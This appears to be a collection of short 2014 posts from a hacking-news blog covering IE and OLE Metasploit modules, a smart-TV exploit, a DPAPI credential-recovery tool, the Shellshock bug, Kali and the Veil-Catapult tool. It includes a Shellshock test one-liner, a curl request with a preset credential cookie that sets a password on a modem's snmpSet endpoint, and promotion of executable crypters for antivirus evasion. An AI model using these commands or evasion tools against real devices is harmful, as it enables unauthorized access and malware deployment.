by admin
Saturday, November 15th, 2014 at 2:34 am
Quick and dirty Metasploit module based off of @yuange ‘s code from 2009. This vulnerability affects Windows 95 IE 3.0 until Windows 10 IE 11. https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module/ Module here: ms14_064_ie_olerce.rb
by admin
Saturday, November 15th, 2014 at 1:58 am
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
The Microsoft update tried to fix the vulnerability publicly known as “Sandworm”. Platforms such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.
http://www.exploit-db.com/exploits/35236/
by admin
Saturday, November 15th, 2014 at 1:56 am
![uart](https://www.illmob.org/wp-content/uploads/2014/11/uart-260x300.jpg)
Using a remote stack overflow in libupnp Fred was able to take control of his TV using the serial port in the back of the TV http://www.fredericb.info/2014/11/exploitation-of-philips-smart-tv.html
by admin
Wednesday, October 15th, 2014 at 3:46 pm
DPAPIck is a forensic tool to deal, in an offline way, with Microsoft Windows® protected data, using the DPAPI (Data Protection API). The tool was updated to support Windows versions all the way to 8.1.
list of recoverable secrets are :
- EFS certificates
- MSN Messenger credentials
- Internet Explorer form passwords
- Outlook passwords
- Google Talk credentials
- Google Chrome form passwords
- Wireless network keys (WEP key and WPA-PMK)
- Skype credentials
Src: dpapick.com
by admin
Wednesday, September 24th, 2014 at 1:11 pm
![](https://42.media.tumblr.com/b76783379264c06e2849f641328daab6/tumblr_inline_ncezhqwoK31qar3or.gif)
A remotely exploitable vulnerability has been discovered in bash on Linux. The vulnerability affects Debian as well as other Linux distros, patch ASAP.
$ env x='() { :;}; echo vulnerable’ bash -c “echo test”
more info: securityblog.redhat.com
by admin
Wednesday, September 24th, 2014 at 1:06 pm
curl -isk -X ‘GET’ -b ‘credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9’ ‘http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;’
src: console-cowboys.blogspot.com
by admin
Thursday, September 11th, 2014 at 1:18 am
http://rcrypt.0xrage.com/
Upload your executable file to encrypt and pack it. So far supports rcrypt,fsg,upx,mew,upolyx,petite, & afx pecrypt.
by admin
Tuesday, July 22nd, 2014 at 2:31 pm
by admin
Tuesday, July 22nd, 2014 at 10:52 am
![](http://www.kali.org/wp-content/uploads/2013/03/kali-site-logo2.png)
Kali’s new image is a EFI Bootable ISO Hybrid image that supports Live USB Encrypted Persistence with LUKS Nuke support, out of the box. More Info @ http://www.kali.org/news/kali-1-0-8-released-uefi-boot-support/
by admin
Sunday, July 13th, 2014 at 3:48 pm
![Veil-Symbol](https://www.illmob.org/wp-content/uploads/2014/07/cropped-Veil-Symbol.png)
Veil Framework recently added a payload delivery tool Veil-Catapult. Works like SMBexec with utilizing Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution using temporary SMB server. :::Read more here::: & :::here:::